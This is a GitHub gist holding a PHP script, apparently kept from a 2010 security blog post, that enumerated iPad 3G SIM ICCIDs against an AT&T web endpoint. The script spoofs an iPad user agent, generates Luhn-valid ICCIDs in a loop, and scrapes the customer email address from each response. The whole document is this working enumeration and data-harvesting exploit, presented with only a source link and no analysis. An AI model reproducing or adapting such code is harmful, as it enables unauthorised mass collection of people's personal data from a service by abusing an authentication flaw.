Created
June 10, 2010 06:15
-
-
Save gugod/432615 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Kept from http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/ | |
| <?php | |
| // iPad 3G Account Slurper | |
| // | |
| // Usage: ./ipadump.php ICCID-base count | |
| // (The script generates the final checkdigit to produce ICCIDs from the entered base) | |
| $useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad | |
| $ICCIDroot = $_SERVER['argv'][1]; | |
| $ICCIDcount = $_SERVER['argv'][2]; | |
| function genluhn($number){ //Crappy home-made Luhn checkdigit generator | |
| $i = strlen($number)-1; | |
| do { | |
| $array[] = $number[$i]; | |
| $i--; | |
| } while ($i > -1); | |
| $i = 0; | |
| foreach ($array as $digit) { | |
| if (!($i & 1)){ | |
| $digit = $digit * 2; | |
| if ($digit >= 10) { | |
| $digit = $digit - 9; | |
| } | |
| } | |
| $total += $digit; | |
| $i++; | |
| } | |
| $luhn = 10 - ($total % 10); | |
| if ($luhn == 10) $luhn=0; | |
| return $luhn; | |
| } | |
| while (1) { //Continue FOREVER | |
| $ch = curl_init(); //Set up cURL | |
| curl_setopt($ch, CURLOPT_USERAGENT, $useragent); | |
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection | |
| curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data | |
| $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to | |
| the ICCID | |
| curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0"); | |
| $output = curl_exec($ch); //Load first page with ICCID | |
| curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer"); | |
| $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. | |
| cURL is nice and passes the previously GET'd info | |
| curl_close($ch); | |
| //print $output; //Prints HTML result | |
| if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just | |
| to keep track of how far the script has gotten | |
| //Parse output. Terribly sloppy | |
| if (preg_match("/<title>Error<\/title>/", $output, $match)) { | |
| preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, | |
| $match); | |
| $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]); | |
| $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I | |
| want space between the period and the next sentence, dammit | |
| $errnum = strip_tags($match[0]); | |
| $status = "Error! ".$errnum; //Return specific error message | |
| } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" | |
| placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", | |
| $output, $match)) { | |
| $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" | |
| placeholder=\"Required\" value=\"/","",$match[0]); | |
| $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", | |
| $match[0]); //Return email address | |
| } else { | |
| $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad | |
| logic, will fix. | |
| } | |
| if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error | |
| message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log. | |
| if ($counter == $ICCIDcount) exit; | |
| $ICCIDroot++; //step ICCID | |
| $counter++; //step loop counter | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment